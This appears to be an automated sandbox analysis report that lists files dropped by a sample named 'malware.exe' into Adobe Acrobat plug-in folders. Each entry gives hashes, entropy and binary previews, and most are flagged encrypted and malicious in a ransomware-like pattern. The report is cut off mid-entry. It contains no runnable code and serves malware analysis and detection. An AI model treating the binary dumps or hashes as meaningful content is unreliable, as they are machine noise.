                        Preview:.9.p,b.-g..e..T..;.6.4,E_.9.o@.:....ofH../;...j_..`........9.1.P..).S..Z.....D....9....c...@%7Y..AE.,+p..+i...;..*..8C.OW.t...{?&..:1...M.s....j+.#.....8...`....\.4.a:..u4|.X.0@..N..EA}.j.t..... |..M<J~c...K.w.......npv.1.e.'.*h.6S9.S...:p'....Jt...`;C.j..=.X)BAX<Z....l.P.1...'.m,p...j.Kp.'..>.Z....a....;k=...i]......T.O.5-.O.>...}..._..g..ng...c.'..M..5f&9.8v4A..FXz.t...Vy...N.=.mc.....~.r.i.K......xa.)D....J........f........?..A...Z.Ys;.N....w..}...P.).K.KN...<e...:8_f..=.w.>.eD2...o}5..QI....3..4xqH....G..;.dp.p.....]...Y9......~]...l..%Q.....a...J.h@z.E...g.n.p.bA+o5N&.5z-2i....sG.wk9...#.f...!..<.3...3..h......$.....^sV.Y.cr....B...........er..O8...wf....;..D..H...&Z|....n...G..!D1...]i..-..=h..D*..v.V7.....{..`..dsES%......`.[8P...CsW\|....P].L........\..IfG..E..@x..{F..^Xg..4s../?~}s....&JD\.<S.t.}*'/$t....._.9...9p.Y4.@&...T.'J...|.@-.B..{.....+>7.2....@.U.{(3.q..X.oN....EMA|...7.w.?..\.)...o6......?.8.8....Q.]....e.`x...

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\drvSOFT.x3d

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):191556
                        Entropy (8bit):7.997216596461296
                        Encrypted:true
                        SSDEEP:3072:Klw8h7bzfbQLBZkElPWNNFS/WK8Bt8U7Zd5lq403qgfMND13MgP9UVjiws0F:KZQLBCAySb8BCmz5lp0agCVBP9OvF
                        MD5:F450712EF39564F255C0D60893793D38
                        SHA1:20A32313705C8214F9186A23F37DBD93E0977DDA
                        SHA-256:4A4E9C67D849A0C0601ACEAA46D360DCE156E05EB38426B8E97EF3D3251CBDE5
                        SHA-512:966F47B2F0F2BB2D3403A26BEA43DC7AD6E81D4035B140E54731486D6050555BBF6F4483F02BF80D539207B8A504249AF1D740C2966A0AB1DCF64AC2DD388CF8
                        Malicious:true
                        Preview:.....`f..6....M.dm+...y.....A...3.../.....C~.o2...>.P.6.]..]-..o?.8....-$....eJ...'.......R=..mw_...2&.J]@A....t...7......y]H......F..x.....w...SBf...h..G&....Z{3.&d..#{94a......e.dI.$.g...3^.x?......J.K....g2{[]=.0.....>C..I...?.v'xZ..w."I=P$...j.x...I.bU..q....^..{h.^.JG....#..,..l.)..`......r:..{..o.zW...c........'T.'.j.H..}...Q..`F..t......\..d7.}.zP,.`Gm+.d.g..#t(..ydsj......a+W...L.o(^X..Gw.92.....I ..6.2.:..xs.H.`. [.OR;...\..:.X.0..\...UN.|{B.v} w..&...Ek...G.HQ\ilu.X.zJm..,.....[.....Q<0....*.hV(..2.&{..0.B..n...9.q.~N.Q........I.tnl....Ix..zm....E..h\....Z...R,.Mu....re........NVW..G....w.....*..bB.T.|....!4..*E..ti.^..p.#.;..V|9....Oq...U....B..G..#y.YT.Yd..t...D{..>..9...E..H.|.Q,....EQ......[.|..C.@..N...2.J5.m..yN[-.byx.....~.x`(..v.Uc...n...r....S.....q...X......o}}V.L.kv..%.7`..}Kz9`0.js.X.M.........^..nW..1.S...j4.M?.....e.....*.)..X.._G...9.....}..B..2...d...q.M....I.>.E;..V...$.).T&pC.....SS.+....f.L.L./....o..6

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\prc\MyriadCAD.otf

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):74192
                        Entropy (8bit):7.997647896047554
                        Encrypted:true
                        SSDEEP:1536:NnE2F2woSB3kg7BsKntHMUDm6tL2EPZuG4ffykPMA+2lG2NZH8TYYafi8:NnZ0SpBjntrDT8Iqffyk9NZH8kYw
                        MD5:C97120919B78AB8BAC90A344CCABFF71
                        SHA1:A4F39F541AA8C27D1B6F96B508D08A927F2AB500
                        SHA-256:645C6BB982513624C2A65BF3761615B2E38C5EAEF575D28DDB339BC49406B0F2
                        SHA-512:6142471819779A004D23964069196C961D0F1EA711E2BA53D837E6FF5E76EC8240A87DA2544255A4F79013A4A43764757AAD5E17C66F5B2366309232EEE42796
                        Malicious:true
                        Preview:.L4...6...O.r{...6V.q..J.....U...k............$.....-.{.i........".-.....[W...K......M.G...(.NP}.,p..W......g.1...L.F.....[]..C.R...]kR...0..Z...O...I..'...s.>v..tq.hm>&.L..RL..<f;@.Qc..75;..@.-3....G.c....\..P...&..Oc......_.q...&p>.@BM.....|.M.....J0.c._...;..{.5......d......b..>rG}.a&5.D..32*......H+.X..|5...p./~O.`(.%...'..7.yb..(.R.........,.r#R@.m..T.d.....;/u..*l.7.3~9iz.r.U......X&ha.M.+..{..:....P..ZlNp.*q.3.|v..B.g.SN..6...6.o....^"X.u.......>.3r..<N..w..v+.G........B...P..t....1..)...)......LpLv.N.lEf.<.S......?.g.\*@!...4.....l.6...9...}.m..g.{.Q..&W3g..rK3..KS.......J..m..K..g.z...M..@.../.c..6.U@T.*m`z.B.^..TU.M...5.mG.....a.w.L.:...Y...Ee.....k.4..ttA0ss...>bG.W1..qb.k'.3I.a.|.z@..9...]..B.si.]h~..h...(...).....r.%.Fx)M....s...M..p.q..X...P..M.d..i..!........,.v}A..L.CGx..xj.(.*,b6.Z.7.-5E...Z..%:.....G...\.m.IHK/.c.E.j.....5...;P.[mo.h?].Bm.#|.A.....)Lk.9.g.T.^f...c..W...........F..;.8.m...'......%........9.q.h_.UCw.;F...t......X

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\prcr.x3d

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2892868
                        Entropy (8bit):7.160174104757413
                        Encrypted:false
                        SSDEEP:49152:QCBUiN8aMYKUeY8myv+EgicdWdzVnfgobL4J80ISOWdescfRoJ5Z6r:nvEYRZEnfgo0Ux7fRo4r
                        MD5:75674A6DFF54271847E9D80D54DFEBAD
                        SHA1:74F6E85AB0B53B6C28CFE0099EE11A13F9D94D9E
                        SHA-256:B2DE30F61016248B4075DCA72F66FEF2DF38E6F1EFB61D66BFFCDE22F1CEAA2B
                        SHA-512:A7FD0B746E87CFC10B419B329FCFC4D9686439C3176443D40317E306BE2FB580F148F4B3C714653235E51CF9D3FB7B4466BBBCBECEBFCFE0C4FCECE27DD77C85
                        Malicious:false
                        Preview:.j.&%j)...)....u.i.rn.s............&.Dw.6.... .l.q.C6.|.......L.S.......H..i#K...J."@....5o1..'e...@..Y....rW......^.Fe....3".....Bg..2.......1....M.N..4.....eN....U...vo,g.y.i.`.Er.e.A..{/I/.@.1.Ao.9.1......()~....e..r.D.k/.fQ.1...._$=..u)`.$n.=....n$.......8...[d. ^u=....Mf..E.nj2.:......#.!.. xit...k/...yn:YZjj.............#\..7f...As.;.n...IA....t..-/*%:3..H..I...n"+.b.....w2:..l=Lj.u.{....-.)dP.F..S.;*.9m.(ZX........^"..yDS....{;..}...Wk2.ov.!.....>}.0...e.2..,.jI.... T.6.:..2...X.!..Q.N......%.f....g.......<..z'Pq`..z'aW.d.`...1S|J.$y..?.=.71..g..#l....v.@a$..=....z..(P.}.K....)...8x....I!5......Kk....v. ..G....n.%.+.p..>.PW.[.~.w9i.?...;_...Z,...:Q...2.,...b.TI.|...2. L.3}g..}...Sw..3X......~P.<.*.WFY.]._..H.rh.....-..?.`...D..L_...>k....S`^$....0rQ.f}.}bi..K&G.jd......Ri.!..?.>..p....Slsu........<.u....20.J73B#g.5.U.L.K.j./....L.j<.....T6....z[.D.zjh......@...%Do.0.z.7......?0,88[H.)O.wD.%.......w....n......'.!.*c...u.+...t:Ae.7.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\tesselate.x3d

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:OpenPGP Secret Key Version 5, Created Thu Sep 10 12:18:06 1992, Unknown Algorithm (0x33)
                        Category:dropped
                        Size (bytes):33860
                        Entropy (8bit):7.995150939827492
                        Encrypted:true
                        SSDEEP:768:VNRQGDzDHsUNLqk2fhtgEMD3PNWR9XI3+4SvyumGbcczDGy:OGDnH9N+FfhtgVrg3XM+44T/3
                        MD5:9EF20A76422A6D9E61EE92C21A680121
                        SHA1:89676C630B6BD7F5D3774647DF3273A120C998D1
                        SHA-256:96AB109236DAF851B6C75239F9D1A71E4BACF000012CEF954A7CADF9AFFC4CF6
                        SHA-512:BD69133022BF88AB0E92CAADDDB73EED20D36BE406F0581B7324AE3AE0D563D6577AFE85D1BB7B708C003DAF16B98048E2CADF09341FFC31B09B2DE82A87A8E0
                        Malicious:true
                        Preview:.O..*.<.3...3NOQ.T...W...|=.Yqd.....Z.n.99...r..Z?.V...X.r\.......Q.W.;...U.........M.......+.@.......F.>...N.)..b..V...}.P1._.u.<..6y....6*..O...t........{..Y=...u\j*....fr..E......I..t...........w.Y..))b.op.`.b.&.W.f./..a...d.*.....,`6...G...J..z..h...(.'.@*o.e.V.v.....9hm...n......f..N...........F......j.F.JX..p.4.^.H ..o........!..!.zb.Qh%7..:...^.p....n.Sf.k..q..h...6....._..F.m.l.v........qB...:r2.'..A_=..Gp..I.8....4....|6L.2..ccI....vd.cE..`C.a.iF.4..7x._.h....A6V4.J....V.... ......X..g.....c+=...C.p...o.sZ..EDZ..BH.....9f?'...TJ.A..Q.o:AYH.^...#K.v....O....$,.9..s..\1....md. .F.....STd.["Gkh....9....}.V\.X.s......f4.Z.>rx...8R..-... ...gB..#C......V..z...b.../.R..\m.}.>\d..y.G..5}.[.&c...j..W=u....<Q.n.-..vMK!r....W.`.Gy.!..t.4b*@Y..L...LL...vG.~"a.%.%?.......D......Z.L...(..Ax...'j. .Q..E.:..8.^...M.H.......K.9Z..~..*C5..S....f...=..N .A .`.."....4".b.../.D..=..l......y.9p...v...)..;..n%c.Qd.....P...V........6..:.h.d.g........V........;.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Accessibility.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):720964
                        Entropy (8bit):7.997467357673042
                        Encrypted:true
                        SSDEEP:12288:yWLXokBbGZK6Kc7GNl7bHChoJvYQlfrQe9HTeuwd5LHhXQjwjIl38+/8:hXF0Y6pslbrAuQ7usLHhmbk
                        MD5:FAB2A7666E0A10935917DFF0A17F4ECE
                        SHA1:82E45575FF0797253E1A477DE641B1CA889C4B2B
                        SHA-256:6BA25DD84533CCD7C3B58D7AA94550C198FACA90FF57066078080E6FDFD8697C
                        SHA-512:5630EA13579FA123BF988BDEC44EBD444EAE703065E3C497CF545084D716DBE659A3781DAE3338890C48B9B4CBED276C2AD826A9CE1ECC9BB03D32477A1A9FC3
                        Malicious:true
                        Preview:e..}....<=.2.I.....Kx..=/..F.6.G.-...MP.~..JA..;;....u...g...!.!n.sN..:..|..w.:.B.4....*..n...5.K.....)..}..._....}....h...PA]...i...)|....U'.mf.].1..S.R....e8&.....x.s..../..7.. ...=(2....8.1.d.j.mS.!.ss.8..2.....%n..H.)....M=%%...N})9.yS0..N.izh..<..4...h...sj..>1.._ir..k...j..1........e#g.^..O.g...X]?.........V.*.g...XMX28L......T5.,#.~.q....j...J.../.*.$r..p[sb..qx+....M5...A.hT.r..........,..._..%...MJ......$...Z|...L...r.....V.v*.;...y.8.y......0..{.c.7.L.LRP....3.kg.nj.J.C.F..|.v....+..`....x..2.}r.I....g.Z.......I5...Py..E../.........=....x,_.x...G..p...&.`'.}.c..8/>.S,..S0...2..... .;}.Z..?.&. ......lv.__...3.2.(5[....c....g3".a..f.&M.:..!.).7........SsM.......p4.Z.M.F/.-;..i..Gy.....0..c.`4...M.q)$E.&.S.-..[.T#...|.b...)+Vj......e..I"...3...... &..).sA.......b.....j.....!.........1..F%.....[....../F.-.#.q..ib.oIh.`......2.px.Rk...S$....+.K..h.@...C ..c.V.p.s..L.........[..u...q)......".......6fK.....Q........c.x:...a.M@Ya#. .

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):18129988
                        Entropy (8bit):6.854934054328048
                        Encrypted:false
                        SSDEEP:393216:wZb+dIFD6oagFwgX4VY02zLrzfJIRQY2jqk02iHyK7QM14v0x2fmSE6pHHQdqfmZ:4b+d0D7bao1wh
                        MD5:37EDCA862B9ECA9658C2B1F86995AA4F
                        SHA1:8FADD5A64BBD2F0E6776C7B6723A80FDF1C58C66
                        SHA-256:BB470BB327FDC08FFB5D3AEBB338880A82450CA04F83AB7BD3C10EC9458AE38B
                        SHA-512:2F7297E10FCFFE8D01CBDE3BBE3B0EEA30B32BEB4321D339ADD41D9EC7511FAC8FACD2D94AA2142E82419785889A8E1EBF584FD732B2BD790FF57DEEB7758DD7
                        Malicious:false
                        Preview:7v....t.5...xE..<a.....z.oO._..z:..~.uA..7..{.E..P..+FY..<.1.".2.zb.......[&z.....qva;k..".uu..c.F....+:v.OP..}...J r....E..u..N.ta.r."1..3..>v..$76B.....8.n.q....[...D...6...f.-B.k..i..(...~.-!....|..3^\0y..M5i..Bw<..:.[...u..j..j..)...`.....[..:YYh..i....i..T...I.|..'......jy.L..rCd.....^...8..Q<..{?G...H..+..@.r.L....K)(K...;.%..&.......db.,........Ld.X/..6....)[..@..`.x..................c.ZxeH./...0.a.m..j.+..#..n....L......|p.w.%xyx.{<..."_...B..X:y.....C......i....$....z.9.#...V..(..d.|_N....|......l..Rai....<..8n&.....0p?].....XC.\.|.WC..1...D$2.Q+X{....T,._..IWn.......#Y!...X/aY8e .w&...X.....h..A...;.o.=.V..3.......s.%........s..c.@...3....qj<z..#...g.......1.S.~...kk........nM..y.2.y..P.|...l.....4.J..Hk...{.......F...r~..H.^.X...K.t.'....Ms......}.e..M..o.......!.=..5-y .@..z..F.I...^(....X... rTJ..+.Ac..D..d_W..uu...........m..S...KD.Q.......2/$.~<.+3c.).L0l.%...-.Q.R_..x..`ac.s.y>.3......R...'.9|....F.....*.fL....!...a...

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\AdobePDF417.pmp

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):101484
                        Entropy (8bit):7.998414247484317
                        Encrypted:true
                        SSDEEP:3072:F2eHtEnx2U2hEuhyY5RelZJHsajWMtXSdt5xK/Tr+:pHtEnx2UTufkZN3WMwdoTr+
                        MD5:8DC2253E9C9FF385495B7F3BD8C9DD78
                        SHA1:364E12B5288D82154566EF80266C0FC0EBFFC28A
                        SHA-256:531823B0F8D146A3C08493653E22E205336162324B01883FE448038D13FA993F
                        SHA-512:7BB456AF385D3EA2EB4504FD99DACE2CDAAEFAA46FC7B0666895AC720C21ABCDA1EBA3FE2E1B720A398FA5E4370522B467D1431430D24346098817F8684459B3
                        Malicious:true
                        Preview:...n.*.q4z....Y....7N(3...3.....h.i@..9.|B'.X..\vP..J>.6..t.l.W.D.....w.l.....8..1."..^h.+.+....C.jTFp...m..>........C.\...+Ln..1S0.kl3.......pX..kl.=...N.e.Z.b<..0./..PF.m.Q.......|.....X"`...9.j~.3r..N..W...,s.....>.k3..`.4..j..6.B.c...^+4.D..E../.V.&f....-".8.8d..........9&..[>...r..p.....Y...*.....5..*OtL...;...d.5.X..v_nASg9.t3Z....F..7.#.u_u..d:...C.....#I......'.pwA....r.KwT.."......OrT.....3|!<.!a.l.k.....0....!a...{...4..qj...o.q.b..^......Ad.C#..$fQ...E&x.t......'....jH...%.s*>...P...cwv.2A.a.8.*U4+.Ma[>p1...H.E...^r.s....%Zh.{..Y..m~....\..l$K...........>U8.?.-.....b.."il......'PZ..Dn(.y.6..j5..A.&J./.K.<I.*.m].x..4........f..Z.E.......).E.s..OP...Xi.m.VZ._h.....B<.Q..|....K.{.!Z.....V...m|.fVi9...M+.7.J...^Z:.....D.|.4....7D.0....U...f.1......<n.Awo9a..(..i..~.S.P...N..*..r..:o'...(.yx;acJ..Y....._Q.+.A..^....q..*...@..C.VR.8.~../fy.....((@....FP..6.9.R..........B.d*vC..[...g..:...&}.....e.7.....b.Ir..tPn.flE..X...%..,.......

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\DataMatrix.pmp

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):513132
                        Entropy (8bit):7.987933984492549
                        Encrypted:false
                        SSDEEP:6144:PO/Xx9e5trvfRoMFAWBq/4M+tqtrCqbuykmHKIjtXa7ndGI7fZQD44xBznpnO+VK:49eDbiZlKIjtVXD4IBpnOqZGM3NXe
                        MD5:35394AC49A8DAA94EA2CD313870331F8
                        SHA1:F001536D8845CB9EF7BF20D5818D164AA64A9F38
                        SHA-256:F6D60AA40373BA18540175B8DB1885E64240DCC8D835BD49C94B65CC793B4941
                        SHA-512:1273B68A090D676869129C27C84CDA1858A7C4EDE38D15E6A8A8607FCFB6FB31A3F502D04A7DB92DDE66518274E9228C303F5811A243B6EAF7349944DB527E96
                        Malicious:false
                        Preview:+R......... k........1u......4w.B.Q..N.a...)\.....(..}.Z..t.[.X.....R....:..C..&e..mx?...Yr..Qt..j.....r.rS...BM..2.h..].l..l..B...qt{.....0b.1.."..(......(B0.k.Q....dC..}..\.h.x)u...........<z..a=.,..{ ......._Uc.......Yq.^.8]..t.i.h.`...D..9q.q..o+.$.7 .f...&....3z..&q.E.gE..@..m....rY.2..V.d.C@...B...@....G. .......3.A...V.{oPS.....Q..P....6.}.......7n.&...}.F.0..Y+........).9C....)..L.y..[.X0.....C.c.....+m.....l.bq..h8.1U....).".,s;........11.?.k.............\..D?d.).........\...HX..=...F..rSLq.A.^.......fR........9.BH......^...Sti...O[.."....l.\N...J.$m..@....k'......@.W../).[..nAz|..+...n..I...F..?V. ._....ly).....c.:....B.Ks..-..b.>..Q.LVr.......k:....@....>..WM[iKAFs!.W..3.ED.je..k..".....en....s.S..|..............ec4.X..Wm..W.U'.ilt.....~7l.L.%.4.'_.y.sx..u..d.H..h..y_........Y.......s.[j.)rT/.|.Y...w..R.K.{'...'..'.c'.=......z.....q..ij..lF9H~[.W.o....d~.`i7.....o..-%.m.....D.+..'.O^......'o\....`..P.e>}..:.G#..

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\QRCode.pmp

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):73324
                        Entropy (8bit):7.997447085522241
                        Encrypted:true
                        SSDEEP:1536:5XCZR/elzbz82UOUw45FEB6rLev+7Xp/svCFCeaa1Zp6TR:5Xuk42wLwB6rLEYZ/lFCZMp+R
                        MD5:64541E3C82527FB4A8E01C1DC7273570
                        SHA1:8C9903D420F005DED85F8746E84597D8B53E475F
                        SHA-256:0474A89B186D66A4FA348D26C4428C9D8B1E24D35E31A0AEFFE784C2DEBC5515
                        SHA-512:2AB89F0C381A0CA538C02EE1F850AB3323CCCEBA7ED793EABE05CBA193DB6480CF7E7550F2547834B48A93B16F3FE7E8285BFE2E0C7C980C62CDD4DC24A0B29D
                        Malicious:true
                        Preview:.......i8.{.G.n..C...Z......Q..8.3...4.../.3}...)...$...@$..#....{..f..od...C!t...9...0..`....Hn.DD.>......0.......6.m]...U.~..."}...........r...Y..m.a.m.M....4....z.D.....7{o.x.R....@.O.#W...ns......=.n.M....b.%....g....[>.:3k..!..75......0..n.l#~.e.U1yu...o.._..|...-..._...S....>..#..kW.,.P....O%u....JX....3....xyR....|m.........d.p..xO...4k.7.z.A.zU.............}..a.t...h./..2.i.<...<.6[%..![6r....M......7.Bs...1%=*.......w8.0Eq....46I<...D.4.=....].ZF.X........z...$N.%.f..-#.....!..#...E..Z3..I.pq.6...9.`.....l~r4..[...R.:...l...6b.-.].z.|.Z..9.K.y.[".%..:.Flz(...n.%...sST..X..SI.....L..I..>h..k.S..@r...=..#..~...+..'..HFZo...wL!.......6....).......q.."....h.....h?(.*WX.4.{.*......)...3o:.c.....O....'Mqke/v.......F..B.T.Ks6*.,;.4.....$.?Ve2=R...uZ$C.L..9...9I'}.....J}.H..M..%.j-y.E....z......Y.iq...9o...'.C.g.y-ITj...z..+..... @>.........}._...a.. Vb 5...n.qG.p.~o..".[........b|.e$Z..=,O9..9..TO..[q:..3.y..9.z.+]Hw...e..r.'.>....$.g.|....

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\adobepdf.xdc

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):46210
                        Entropy (8bit):7.995938141846805
                        Encrypted:true
                        SSDEEP:768:mMixKTnfaEwIe8mZpSgI+pIEfJng2UZUp/X7E4+oOb2zMszOVZRbP7zF+mBla41o:QMw2mZpH3TJgzWpvgSfwx9TzF+Ol14UG
                        MD5:1350A7F2F295E9F22E5C920B9AD0CC1E
                        SHA1:1310A4FD228B09B6667B29C24C078B56ACE6E6D3
                        SHA-256:74664FF560613B4454CB803D2EDF9C20F9476B27F6620D115D7F431C4935DB19
                        SHA-512:C9466BA659EA1B999E402A7FEDED0D13687F46F75D7123B5B32029393E7AC03015D31B30A5D90A910ABDB0819D95B38C19A5EEABEC9D74A93C9D6A60E94206B8
                        Malicious:true
                        Preview:#.H.<...../+..E..f..I...s4P.F...~n..%Q....@T..].+.i...*.....Ok....'.....t.?.\n..X)7.........~...u..V..../...A..8N.?...<c(...:1@...v..^qQ.a!.C}R.u#G..M.nw\1.D....3.5[.i.....,:.!..)Y.....u].......U<...$3........S.^,.......k...Y#.1.Q..-..n..].J@.].L.5..F...[q.....#...c..N...w....$........=t....|......h.....d.F......u..ZER.J.^..:K...Y...T./.F.W........;.K2RO.'.....O..g..VH.U...]...iA....=@z..-.........;.l..3..?........ZQ4...+|..Q.\...vT._.V...4?.j..^vZ..$(..F:...6N1../..B7.M.....7....d-...PZ./...#.....+......~o..8.c....{...{{.[d....a.C....d...(P..k.6[~... }Z.r.r.Ml...CAw1.....U?[....$.......:...S..X...6.k...M..;..(.q..K].kBZ.{...Z.dA.`....".....F...|H...7J.d\|\a....{DX.f.k.}..G.9....F../.<&.v.3..^.39..m.....w..c..:q,..........'.(g.-.`i/DK>..gx...tZ.S..P.j.M9.t.V8@@......|...X._.b.{...:....a.....S...o..m../.....C.....J..N<..>z.ME..n>.V0...n..../..E.#gY$..D...HYD-.2....`._,.y....8..LI..aE:5..N....O#.3)$%.......K...?.J.}.ZsAO....W8B..B....U.....E....

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\CompareMarkers.pdf

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):22455
                        Entropy (8bit):7.992063580936647
                        Encrypted:true
                        SSDEEP:384:pykvPNz6Tns4qAatZisLAgMmQfTAvLgWaJIt2wWMRqj0:T0rsxhcgMB0U/JIt/nU4
                        MD5:CDCFFCF5913A5AEC24F1A49FBEEA15C0
                        SHA1:512CBF055FD47E0E5E2477088B59AEC03CF132CC
                        SHA-256:F3CD101E899FE29A33138FAF2F62A4EAE4CBA677CD1ABF7A587A4F9A2EA52838
                        SHA-512:2A22A42036FB0A9B9F3B8A9E52F9C8BB432EBCE749261BAC6DAB41F417B194B4A03ACC079DCA0D2D242A6883878A031ED0B30173B9155533CE02BF3277190247
                        Malicious:true
                        Preview:.b.F.C.$g.R=mpo..A...WS..g0^...-.+...:sDa...J.....p....v7z'8?.....n......z)G.%x%...SP_.I&P.zBu`wb.?...c`.,..}Q...!v0A@-|)..+r&"W.n.g.nS.'(o....!.HfQ.z.Y;...\...L)...s...8N...0..J_....f6..............|RB......$.rZ#..$x...4..E20a...C.....y.z.../G...C...*.H.-i,..%o...I.l.n..r....]. .........@J]..3..!.....v...F4..,@/.tu..p.2..9....Z8..9.D1.u.p.s?..aF.}X.....g>.....a.=....~..Z..r.<..].@M.n..b>GY....*l`e..Pk.....=.jp%Jk'...wf5.U....).q....n9p0.tN3...q..rg.-.x........n........../>...Wr.w.R...F>y..$...M)..]..Nx(.?>n.."...."..4..i.vo6.....8.'P.A..=.!..s[....$t;l...E.R~..#....(.. `.n...........~..]N...~lL2.S..k..a....Q...!.T.7.m...K\@.......U....._.z..M.>.......T...F..2-..Q-.RYbkLu.v......0h......"......0....~6.(Z.T.b..n..#...H.G.6U.J..a.O(...a..f....rv.....=..}.pd.g~.:Y#....,d.v..[...gi..k...]..14.,..AC.N.}c'.`..L........Z..nK...-...MKl._.....5.,....z........86...I{..#.|.4.......o............]..."y.y.......9..[S;+........{q.6....j..C.{..J.M.Y*7.f+.V......Q

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):57326
                        Entropy (8bit):7.996838791137797
                        Encrypted:true
                        SSDEEP:1536:KOVv5lkHNjzV7Kz4DitzbnqXU0Zaw4t4DrchBx:rLsjxAyU0ZattM2x
                        MD5:A5F07FBB7452E66A2EFC58F8AB581CED
                        SHA1:567C12A2C7E4D8205C2D0A2DCDA29D0495C9CA0A
                        SHA-256:99995C66D1688A3615419D88BA46E71B2E60E5C9A26E472A872CEA3B8E88E465
                        SHA-512:9502063CE84024C5E3CA6814FC0C994390AC552F89D14284502476516168238B4A2B063B7FA1B4BDCFBDD9D9B7475F16C8C06ED3B1556513FB2EA5FBDA06E063
                        Malicious:true
                        Preview:...f....xL.2G.8|.H..l....XM.M.-(,........b.c.;.......j.1..r...&_..G.H......?#}.v.i8W..../.2.. .Z1t..ez..?.....l%...\..T../s..5...'....y.?7.....1c./.S.[...F.Z.n.;G.J>`'kke..|.`.;...]......R.{;.KZ..&.-e...[....q..5./9M&....8U?,.a:.O.i.&(`.70"..3...j7..........kdXcZ.l..1....wr......WL."3....+Cq=.,h.....03 `R.....-...$..P$.;..0....Q@.^...|.....z........ObicC.......{:...S;...........`...'...6.s.P........)...F..V1.T..g0...h....H..........Q#...a...8[.a.Y.!!..sG....[...DW..Z.4.<.h[.l'....\W"...(..H;;"....?V.}.....o.H.......Q}Q[o...jRF.........).{Y"D|.;..-.6).,a:k./?.}@..._.JJ.N..F....C.|.+G.8.H..2..$..t.Q.k..."..[Y.....D.. (..xC....?J[.~'.5.T...6d....Q..9m..SPW... .zJN.M.=d...@3?<R{&.........73.v.T.7.=o..8.s..e//..c.g.s=.Pq......9.l..'..NU..h.h..*>..(..T......C,Ja..8...\NR.=D..y62.+.....h>.}g.N>.p........U.yM(K.=...aD.....+..z.,..x.*l..........j.;.+.....*.2.M1.....l.0%T_.q.`'x.Jk$o.R"$.Q{.C.-.....J-.sr...9..MJ.......n`.-....N.....~..3..'d7......2l.C

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Faces.pdf

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):33121
                        Entropy (8bit):7.994723694752612
                        Encrypted:true
                        SSDEEP:768:V/nfp4LADx43ORuruxE94XkhOX+0esRAbc/wExn:V/fpft4+RuKxEy0hNmAbcDxn
                        MD5:17E0DA1628CD85FC392A480784C68914
                        SHA1:AD4AB11B9C8B2F67425CF91DA534F72ED2B956D7
                        SHA-256:8CC9DB7987C2BB6F50DAC018358665C54EB0F84B27174B1785D783EC822D8EEC
                        SHA-512:2638F454F0B1A2EEC8DB7549EC8A84A5F6E90FA04B3AB28035EE28AB6B041B2AA56A871AFB0B10657CB8D76606EE7C41913347C23D2FF5853E85D85D2F27F146
                        Malicious:true
                        Preview:.6...+.&.".......[d*.].W4...@.[.i|.................8.K.>...~(..N..........~.."W!................K.....ui.........Lz....T.B.<......(.k.E.b.Fs`.....P..0/~.P.\#.I....\..R.8...J....Q.tj....u...0.......S..Z.8.~.|.gW.....K........q...I."4=....._........)..........p.8VH........vA..*.(R.W)Ske.;...#....D..u$.....p....c.'...P..;.S5....>.}l..+3k.1._Q.R.....te.*X.....u....Hx....!....S(..8!.H...o....}..J...7.`>F".%.f0.....".L8l.... .N.i.....?.LG.o.j...\..pi'Z....()F....D.z.... ....b....T.H..#......1(.?....c..=b..3A...%.+..sO ..q....O..S.P...Aj.D?.I?.i...5.(Cv..=a..-.V.e8...UN......Y)...'.6.....S..B..Idp...d..9.....N...{...}W...4..r.\73....X..H......Re........Y.Ia.E.?3.m4...;...Z.mi...:..Ot....)..x..-N..,.?.Q.......Xcl...HH.M.1.O.1... z.....Y.......(...V.+...t}(....u.F....r.....j..o[.ey.Z.:|.../.WBu.....o..mq.........8Y....a.HYjF|5....I.."./..;6s|cC.B.<N%.q5.?...a.Qa...R%....X}..0*.a.....%...?...Kb.....^T....m.J.".......~..FzF..._.w. w.`-2.GL..

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Pointers.pdf

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):47005
                        Entropy (8bit):7.995895099685801
                        Encrypted:true
                        SSDEEP:768:GjwmgNSlwTVwNNNV3Zm2rteTSPZh25ykOdYMmup2R742BRDNuTiryyl6W:G3VlwVQNzZx0EZA5z/MTK7T/huTivlJ
                        MD5:6D58545B481126EE11EFF01C0E5E74C8
